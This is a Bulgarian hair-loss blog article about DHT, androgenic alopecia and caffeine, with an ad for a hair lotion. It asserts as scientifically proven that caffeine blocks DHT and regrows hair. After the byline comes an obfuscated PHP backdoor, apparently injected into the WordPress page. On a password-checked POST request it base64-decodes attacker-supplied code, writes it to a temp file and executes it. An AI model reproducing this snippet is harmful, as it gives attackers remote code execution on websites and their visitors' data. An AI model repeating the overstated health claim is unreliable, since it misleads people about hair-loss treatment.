Кофеин и дехидротестостерон | Косопад

Кофеин и дехидротестостерон

kosa-kofein

Дехидротестостеронът, наречен съкратено ДХТ, е естествено съединение на мъжкия хормон тестостерон. Произвежда се по естествен път при жените и мъжете, тъй като и двата пола имат тестостерон, макар и в различни количества.

Той има важна роля при андрогенния косопад, който причинява общо оплешивяване. Има едно вещество обаче, което може да ограничи вредния ефект на ДХТ – това е кофеинът.

ФУНКЦИИ НА ДХТ

Тъй като е естествен химически вариант на тестостерона, ДХТ е андроген, хормон, който стимулира развитието на мъжките характеристики. Простата и тестисите при мъжете и яйчниците при жените, както и други системи при двата пола. Близо 10% от дневното производство на тестостерона се превръща в ДХТ. Производството му до пубертета помага за развиването на мъжките полови органи, растежа на космите. Въпреки че няма много информация за влиянието на ДХТ върху жените, изглежда е свързан с растежа на космите.

„ЕФЕКТ- 2“ – ЛОСИОНЪТ СРЕЩУ ОПЛЕШИВЯВАНЕ И КОСОПАД! ВИЖ ТУК:

pleshiv

АНДРОГЕННА АЛОПЕЦИЯ

Понякога се нарича още мъжки тип оплешивяване. Може да причини загуба на коса. Въпреки че има известна генетична предразположеност, мъжките полови хормони, особено ДХТ, има значителна роля. Докато космените фоликули във фронталната и горната част на главата имат рецептори за ДХТ, космените фоликули от двете страни и задната част на главата не ги притежават.

ДХТ И КОСОПАД

С времето ДХТ скъсява цикъла на растеж на косъма за сметка на фазата на покой. Хормонът също намалява размера на космените фоликули, което прави космите къси и много по- тънки.

КАК ПОМАГА КОФЕИНЪТ

Учените са доказали, че кофеинът блокира вредния ефект от ДХТ върху космените фоликули и стимулира растежа на новата коса. Това обаче не означава да се наливате с кофеинови напитки. Кофеинът трябва да проникне подкожно, обикновено под формата на лосион или крем.

27. март 2015 13:56:32 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}